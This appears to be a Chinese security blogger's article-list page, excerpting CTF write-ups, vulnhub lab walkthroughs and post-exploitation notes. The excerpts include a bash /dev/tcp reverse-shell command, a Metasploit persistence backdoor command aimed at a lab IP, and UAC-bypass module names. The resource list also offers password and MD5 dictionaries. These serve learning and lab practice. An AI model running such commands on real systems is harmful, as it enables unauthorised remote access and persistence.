自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(45)
  • 资源 (7)
  • 收藏
  • 关注

原创 TOP10之反序列化

前言虽然php反序列化的文章,网上一搜一大把,但是我还是想记录下,方便以后忘了自己在回头来看。反序列化是什么?通俗的来说:序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用;这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性;序列化有利于存储或传递 PHP 的值,同时不丢失其类型和结构。通常在使用反序列化时都会...

2019-12-09 20:24:33 576

原创 TOP10漏洞之文件包含

前沿很早之前就学习了top10的漏洞,但是对于我自己来说基本上就大体的过来一遍,有一句话就是学习好基础,让你少奋斗两年, 于是我现在又来过一遍top10漏洞。在这些中主要侧重于我自己的思路。##文件包含含义:文件包含在我的理解来说就是程序员在自己写代码是要调用其他的文件,使用包含文件的函数。在我们耳中关于文件包含漏洞的存在基本在php,但是在jsp, asp中同样也存在文件包含。于是在这篇...

2019-12-09 20:23:40 1063

原创 Nmap详解

Nmap详解##前沿: 学长在一篇总结下进行了如下的评论。仔细想想自己以前真的没大多深入的学习nmap。于是今天来学习一手。nmap 参数详解例如:blah.highon.coffee, namp.org/24, 192.168.0.1;10.0.0-25.1-254-iL filename 从文件中读取待检测的目标,文件中的表示方法支持机名,ip,...

2019-12-09 20:22:48 418

原创 后渗透流程

后渗透流程权限提升绕过UACmsf模块Exploit/windows/local/bypassuacExploit/windows/local/bypassuac_injectionExploit/windows/local/bypassuac_vbs系统提权提高程序运行级别msf模块(Exploit/windows/local/ask)缺点:需要uac交互后渗透信...

2019-12-09 20:20:45 888

原创 bytectf部分wp

boring_code拿到源码<?phpfunction is_valid_url($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (preg_match('/data:\/\//i', $url)) { return false; } ret...

2019-09-10 23:21:48 988

原创 awd初级思路

网络拓扑 ssh复制到电脑上修改 ssh密码 数据库密码ssh密码修改:sudo passwd usermysql密码修改: set password for 'user'@'localhost' = password('newpass');备网站源码 数据库备份网站源码使用Winscp等工具下载var/www/html下的文件,备份tar -zcvf web.tar.gz /v...

2019-09-09 18:33:20 3597

原创 一次迷迷糊糊的靶机渗透Lazsysadmin实战

靶机ip:192.168.85.141 kali攻击机:192.168.85.130发现靶机开启了22,80,139,445,3306,6667端口,并且靶机运行着samba服务先来看看80端口。发现这个网页由Silex v2构成的发现网站就是一个静态网页,并没有什么用。于是用dirbuster进行目录爆破在目录爆破中,我们发现了phpmyadmin,wordpress,...

2019-09-01 18:10:45 1079

原创 浅谈ctf中phpinfo需要关注的点

首先我们先谈谈php各个版本的的差异php5.2以前__autoload()加载类文件,但只能调用一次这个函数,所以可以用spl_autoload_register()加载类关于 __autoload()函数,如果定义了该函数,该代码就会被调用关于spl_autoload_register()函数:注册给定的函数作为 __autoload 的实现当出现未定义的类时,标准PHP库会...

2019-08-27 22:44:08 1391

原创 Ogeek部分题解

LookAround找到⼀个类似的题:从⼀道CTF题看如何利⽤本地 DTD⽂件实现XXE攻击/根据⽹⻚回报应该是xxe本地DTD直接博客payload直接打参考:https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discoveryfor-xxe-exploitation?from=timelinePayload:&...

2019-08-27 11:04:23 308 3

原创 Billu_b0x靶机渗透实战

攻击机:kali ip:192.168.85.130检查主机存活.发现192.168.85.140就是我们的目标主机了查看目标主机开放的端口,发现开放了80端口和22端口,并且SSH为5.9版本,apache为2.2.22版本访问80端口这里提示SQLI,即可能存在sql注入使用bp抓包,放入sqlmap中检测,报错。使用一些模块进行绕过,也没有成功。例如:python2 sq...

2019-08-22 22:42:43 560 1

原创 内网文件的传输与下载

SCP本地到远程将本地文件上传到服务器scp -P 2222 /home/tmp/flag.php root@host_ip:/root/tmp/root@host_ip表示使用root用户登陆远程服务器/home/tmp/flag.php表示本地上传的文件/root/tmp表示保存在远程服务器上的目录和文件名-P 表示选择端口,注意-p已经被rcp使用;远程到本地scp ...

2019-08-22 15:28:07 3264

原创 SUCTF_2019部分题解复现

本次比赛还是太菜了,只写出了两道题。但是学习到了很多东西。webcheck题目是一个文件上传,但是限制了很多地方,限制了文件类型,并且判断了文件上传的文件内容,这里是使用exif_image判断的。可以通过手动添加GIF89,也可以在文件头加上width和height这里在前面添加#define width 1337#define height 1337auto_prepend...

2019-08-19 20:37:36 1436 1

原创 一文了解端口转发

内网端口转发应用场景:当你拿到一个网站的shell,然后提权,以及各种的一些操作,当你想开启目标服务器的远程桌面时,然而他却处于内网的服务器中,有什么办法实现呢?这里就要运用到端口转发了。端口转发技术,用于允许外部备使用私人电脑服务网络。对于防火墙禁止访问某些端口的问题,比如3389端口,我们可以将利用机器的3000端口做端口转发,从外界接受数据,转发给本机的3389端口,从而绕过防火...

2019-08-19 12:12:46 7063

原创 网络与信息安全领域专项赛 wp

webgame打开页面直接审查源码发现这两个js文件比较可疑,于是查看。在cqg.js文件中发现了于是在http://6d03d4f7b3f24269af3d217475afd474d9f69cc849b941ce.changame.ichunqiu.com/score.php页面中直接post:score=15即可得到flagwho are you打开页面随便输入先...

2019-08-18 12:36:14 904

原创 认识powershell攻击

简介:PowerShell是一种基于任务的命令行shell和脚本语言建立在net。 PowerShell帮助系统管理员和高级用户快速自动化管理的任务 操作系统(Linux、macOS和Windows)和过程。PowerShell命令允许您从命令行管理电脑。 PowerShell供应商让你 访问数据存储,如注册表和证书存储,尽可能轻松地访问文件 系统。其可读性,易用性,基于当前所有shell之首。...

2019-08-12 17:09:38 1685

原创 meterpreter后渗透之权限维持

Persistence后门使用此方法建议运行前关闭杀毒软件Run post/windows/manage/killav输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。详细信息如下:-A 自动启动一个匹配的漏洞/多/处理程序来连接到代理-L如果不使用%TEMP%,则选择目标主机中写入有效负载的...

2019-08-09 19:50:00 2975 1

原创 De1ctf之SSRF ME多种方法

SSRF Mebuuctf有靶场复现地址:http://web68.buuoj.cn/出题人给了hint:hint for [SSRF Me]: flag is in ./flag.txt第一种方法:利用scan方法直接读取flag.txt打开网页f12获取源码。#! /usr/bin/env python#encoding=utf-8from flask import Fla...

2019-08-09 16:33:29 3581

原创 解决软件安装的2203报错

今天下午,由于虚拟机出了问题导致,于是卸载了,重新安装个虚拟机。但是在安装时候2203错误。因为花了接近5个小时才解决这个错误,所以记录。以下是解决办法:打开电脑用户环境变量。找到这个文件夹将其内容删除,若没有文件夹,建一个空的文件夹。、打开电脑环境变量。一样的找到这个文件夹将其内容删除,若没有文件夹,建一个空的文件夹。后重启电脑,重新安装即可。...

2019-08-07 00:19:31 5237 5

原创 一次失败的vulnhub靶机渗透之breach1.0

靶机地址下载https://pan.baidu.com/s/1KuwK_8MqCWhcIcNpTJ-OLQ这是靶机的介绍在一个由多个部分组成的系列文章中,Breach 1.0是一个初学者到中级boot2root/CTF挑战。解决问题需要扎实的信息收集和坚持不懈的努力。千方百计。VM配置了一个静态IP地址(192.168.110.140),因此您需要将您的主机专用适配器配置到这个子网。非常...

2019-08-06 10:49:25 1377 8

原创 Vulnhub之acid靶机渗透流程

1,检查靶机主机是否存活。2,检查靶机开放的端口并对端口进行识别发现33447端口存活(存在web服务)由于只存在web服务和apache服务,所以只能从web服务和apache服务下手。3,首先直接御剑一把梭大概看了下,先放在这里。F12查看网页源码,发现存在注释。0x643239334c6d70775a773d3d16进制转换为字符串d293LmpwZw==,最终解码出来...

2019-08-03 10:58:50 970

原创 渗透之metasploit技术-端口扫描,漏洞利用

一,使用主机模块进行端口扫描启用metasploit msfconsole检查有哪些可用端口。search portscan使用TCP扫描模块并检查有那些参数需要设置。use [模板]show options设置待扫描的IP地址(RHOSTS),设置扫描的端口范围(PORTS),设置扫描的线程(THREADS),最后使用show options查看设置的参数。run,运行。...

2019-07-31 17:15:08 6348

原创 linux反弹shell的几种方法

攻击机上执行 nc -lvp 2333说明:-l 使用监听模式,管控传入的资料。显示指令执行过程。<通信端口> 设置本地主机使用的通信端口。(2333即为自己设置的通信端口)第一种方法:使用bash命令(bash命令行是计算机操作的一种方式)攻击机上输入 nc -lvp 2333受害机上输入 bash -i >& /dev/tcp/192.168.10...

2019-07-30 18:18:12 236

原创 linux反弹shell原理

一直知道Linux反弹shell。但是不知道其原理所以今天学习了一波。文件描述符首先我们要明白文件描述符是什么?文件描述符定义:文件描述符在形式上是一个非负整数。实际上,它是一个索引值,指向内核为每一个进程所维护的该进程打开文件的记录表。当程序打开一个现有文件或者创建一个新文件时,内核向进程返回一个文件描述符。在程序设计中,一些涉及底层的程序编写往往会围绕着文件描述符展开。但是文件描述符这一...

2019-07-30 16:32:36 279

原创 BUUCTF---easy-tornado

打开链接发现存在3个txt文件依次访问flag.txt直接说明了,最终的flag在/fllllllllllllag文件下hints.txt下提示是filehash,要是md5(cookie_secret+md5(filename))才可以结合/fllllllllllllag找到flag.但是cookie_secret不知道提示render. 谷歌发现render是python的一...

2019-07-29 21:53:24 1642

原创 网络基础原理之OSI模型与TCP/IP模型

OSI 是指((开放系统互联(Open System Interconnection))OSI参考模型定义了网络中设备所遵守的层次结构分层结构的优点:开放的标准化接口多厂商兼容性易于理解、学习和更新协议标准实现模块化工程,降低了开发实现的复杂度便于故障排除7-应用层提供应用与程序间的通信6-表示层处理数据格式,数据加密等5-会话层建立,维护,管理会...

2019-07-25 22:12:22 264

原创 php代码执行漏洞总结

一 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等<?phpecho `dir`;?>二 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、include_once()、 ...

2019-07-23 13:20:32 647

原创 docker安装及入门学习

docker安装1.更换国内软件源,推荐中国科技大学的源,稳定速度快sudo cp /etc/apt/sources.list /etc/apt/sources.list.baksudo sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.listsudo apt update2.安装需要的包sud...

2019-07-19 23:38:06 108

原创 各种类型的sql注入

前言,因为学长叫我用ppt总结下自己这几个月学了什么内容,早就想大总结一次了,刚好有了这次机会。自己从2019二月份接触了三叶草小组的朋友,无意接触了ctf,感觉很有趣,于是就入了信安这个坑。以下全是自己个人的总结,若有地方不对,还请大佬指正。学习总结学习了web基础的一些漏洞1,sql注入原理: sql命令插入到web数据表单,然后提交被数据库误认为是正常的SQL指令而运行,从而执...

2019-07-06 23:25:14 815

原创 bluecms代码审计

说明:最近打算入手cms,所以找了一个简单的bluecms先练练手,先立个flag至少一周一个cms.首先使用seay源码审计工具审计全部的源码1,发现/uploads/ad_js.php下可能存在sql注入漏洞打开ad_js.php文件首先判断是否存在ad_id变量如果存在就执行下面的操作跟踪getone函数,在mysql.class.php文件中,用于封装为sql语句。后跟...

2019-07-06 18:02:11 1299

原创 实验吧web-你真的会php吗

题目链接:http://ctf5.shiyanbar.com/web/PHP/index.php打开网页发现页面只有一个have a fun!!查看网页源码也没有任何东西于是直接F12看headers发现了跳转到http://ctf5.shiyanbar.com/web/PHP/6c525af4059b4fe7d8c33a.txt得到源码<?php$info = "...

2019-06-28 17:35:42 103

原创 c语言算法练习3+杭电oj部分题

杭电 oj 1108最小公倍数(辗转相除法)#include <stdio.h>int main(){ int m,n,h,temp,a,b; while(scanf("%d%d",&m,&n)) { if(m>1000||n>1000) break; if(m<n) { temp=m; m=n; ...

2019-06-27 21:28:37 512

原创 c语言算法练习2+杭电oj部分题

杭电oj 1062字符串翻转问题#include<stdio.h>#include<string.h>int main(void){ int num,k,len,i,j; char s[1002]; scanf("%d",&num); getchar(); while(num--) { gets(s); len=strlen(s);...

2019-06-27 21:22:52 736

原创 c语言算法练习1+杭电oj部分题

给定一个字符串,请你找出其中不含有重复字符的 最长子串 的长度。#include<stdio.h>#include<string.h>#define SIZE 10int main(void){ //输入一个目标字符串 char a[SIZE]="zaqwsxxz"; //创建一个数组b用于接收子字符串长度 int b[SIZE]; int i...

2019-06-19 22:49:36 403

原创 WHUCTF easyphp代码审计

JSON 数据结构介绍:按照最简单的形式,可以用下面这样的 JSON 表示 “名称 / 值对” :{ "firstName": "Brett" } 等效的纯文本为firstName=Brett但是,当将多个"名称 / 值对"串在一起时,JSON 就会体现出它的价值了。首先,可以创建包含多个"名称 / 值对"的 记录,比如:{ "firstName": "Brett", "lastName":...

2019-06-09 22:48:50 1751 7

原创 iscc2019 web+misc题解

2019-05-07 ISCC 2019 (一)Webweb 1代码审计题判断value,其值不能在32和127之间,否则销毁chr函数在转换时会自动取模256,所以我们只需要在原本ascii码基础上+256即可(即十进制ASCII码加上256还是等于原数)intval()在处理16进制时存在问题,但强制转换时时正常的.payload : value[0]=375&val...

2019-06-05 21:20:37 990 1

原创 JSON WEB TOKEN-----jwt

一,JWT介绍JSON Web Token(JWT)是目前最流行的跨域身份验证解决方案。是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。二,JWT的原理服务器认证后,生成一个JSON对象,发回给用户。就像下面一样。{ “姓名”:“FFM-G”, “时间”:“2019年5月”...

2019-05-16 13:39:39 484

原创 ctf常见的编码

二进制:二进制是计算技术中广泛采用的一种数制。二进制数据是用0和1两个数码来表示的数。它的基数为2,进位规则是“逢二进一”,借位规则是“借一当二”,由18世纪德国数理哲学大师莱布尼兹发现。当前的计算机系统使用的基本上是二进制系统,数据在计算机中主要是以补码的形式存储的。计算机中的二进制则是一个非常微小的开关,用“开”来表示1,“关”来表示0。二进制实例:1110111100110–》7654...

2019-05-03 23:57:09 13170

转载 python脚本实现半自动化布尔盲注

原文链接:http://zzqsmile.top/2018/06/04/python3/2018-06-04-布尔盲注/from optparse import OptionParserimport sysimport requestsimport hashlibparser=OptionParser()parser.add_option("-D", "--database", a...

2019-04-27 22:11:52 864

原创 滴~ ctf

header('content-type:text/html;charset=utf-8');if(! isset($_GET['jpg'])) header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');$file = hex2bin(base64_decode(base64_decode($_GE...

2019-04-21 18:52:15 333

原创 php序列化+反序列化学习

变量序列化:1)序列化是将变量转换为可保存或传输的字符串的过程;2)反序列化就是在适当的时候把这个字符串再转化成原来的变量使用;3)这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性;4)序列化有利于存储或传递 PHP 的值,同时不丢失其类型和结构。序列化函数serialize()serialize–产生一个可存储的值的表示serialize( mixed $value...

2019-04-12 16:30:37 148

jdk1.7.0_21.zip

jdk1.7.0_21.zip

2021-05-25

12月26日御剑1.5.zip

御剑全家桶工具

2020-06-15

超全的字典,足够你用了

自己在写用的字典,足够你用了

2019-11-15

网络设备默认密码.txt

网络设备默认密码

2019-11-15

收割机去后门版本.zip

收割机去后门版本 zip

2019-07-30

60万条收费MD5密文.txt

60万条收费MD5密文加密解密 txt

2019-07-30

身份证后六位。全国弱口令top1000,常见password 25577541个

身份证后六位。全国弱口令top1000,常见password 25577541个

2019-07-30

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除